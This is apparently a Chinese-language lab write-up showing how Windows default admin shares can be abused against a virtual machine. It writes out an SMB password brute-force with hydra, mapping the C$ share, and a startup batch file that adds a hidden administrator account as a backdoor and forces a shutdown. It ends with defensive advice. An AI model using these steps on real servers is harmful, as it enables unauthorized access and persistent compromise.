可能是最全的windows默认共享风险利用

        我是安全界的小学生,之前写了一篇“windows彻底关闭默认共享”,但是一直未研究“为什么要关闭?不关闭能咋地?”,最近进行了一次验证实验,探索了默认共享会带来的危害,加深了对默认共享的理解,闲言少叙,主戳主题:

一、所需条件:

1、个人PC(后面都称作本机)

2、虚拟机上windows服务器 192.168.67.128

3、hydra工具:进行暴力破解

二、开始实验:

1、本机状态


可能是最全的windows默认共享风险利用_第1张图片
本机初始状态


2、windows服务器状态


可能是最全的windows默认共享风险利用_第2张图片
windows服务器状态


3、在本机输入命令:net use k: \\192.168.67.128\c$


可能是最全的windows默认共享风险利用_第3张图片
在本机进行操作1

结果:


可能是最全的windows默认共享风险利用_第4张图片
在本机进行操作2

输入已破解用户的用户名和密码,比如:Administrator  password

如果密码错误,使用hydra进行破解:(附上hydra使用方法)

命令为:hydra -l administrator -P pass.txt 192.168.67.128 smb


可能是最全的windows默认共享风险利用_第5张图片
破解命令

破解结果:发现密码是123456


可能是最全的windows默认共享风险利用_第6张图片
使用hydra破解结果

然后再进行登录:登录成功


可能是最全的windows默认共享风险利用_第7张图片
破解密码后再进行登录

4、在查看本机,会发现多了一个k盘(为windows服务器c盘的映射)


可能是最全的windows默认共享风险利用_第8张图片
成功映射到本地

5、在开机启动项里添加批处理文件

先写一个批处理文件:

copy con  111.bat

net user Ethan 123456 /add

net localgroup Administrators Ethan /add

shutdown -s -t 180 -c "hello man,your PC has been hacked by Ethan!!!"


可能是最全的windows默认共享风险利用_第9张图片
写一个简单批处理

复制到桌面和启动下面:


可能是最全的windows默认共享风险利用_第10张图片
复制到桌面


可能是最全的windows默认共享风险利用_第11张图片
复制到开启启动项

6、当对方重启服务器、或者出于好奇,打开桌面的.bat文件时:弹出关机提示,同时新建Ethan用户。


可能是最全的windows默认共享风险利用_第12张图片
重启弹出开机提示

查看,已经创建新的Ethan超级管理员账户

可能是最全的windows默认共享风险利用_第13张图片
已创建Ethan用户

此时,如果对方未发现Ethan用户,就算修改administrator用户,仍然有Ethan用户作为后门。


可能是最全的windows默认共享风险利用_第14张图片
使用Ethan用户进行登录

7、如果服务器开启了远程桌面,也可以使用Ethan账户进行远程桌面登录。


可能是最全的windows默认共享风险利用_第15张图片
输入Ethan用户名和密码

成功:


可能是最全的windows默认共享风险利用_第16张图片
成功拿下服务器

三、总结:

关于windows默认共享问题,要想利用,首先需要服务器开了共享,其次是知道对方的用户名和口令,所以还是要注意修改默认用户名,并加强口令复杂度。

如果不需要,彻底关闭默认共享。

我是安全界的小学生,欢迎大家批评指导。

你可能感兴趣的:(可能是最全的windows默认共享风险利用)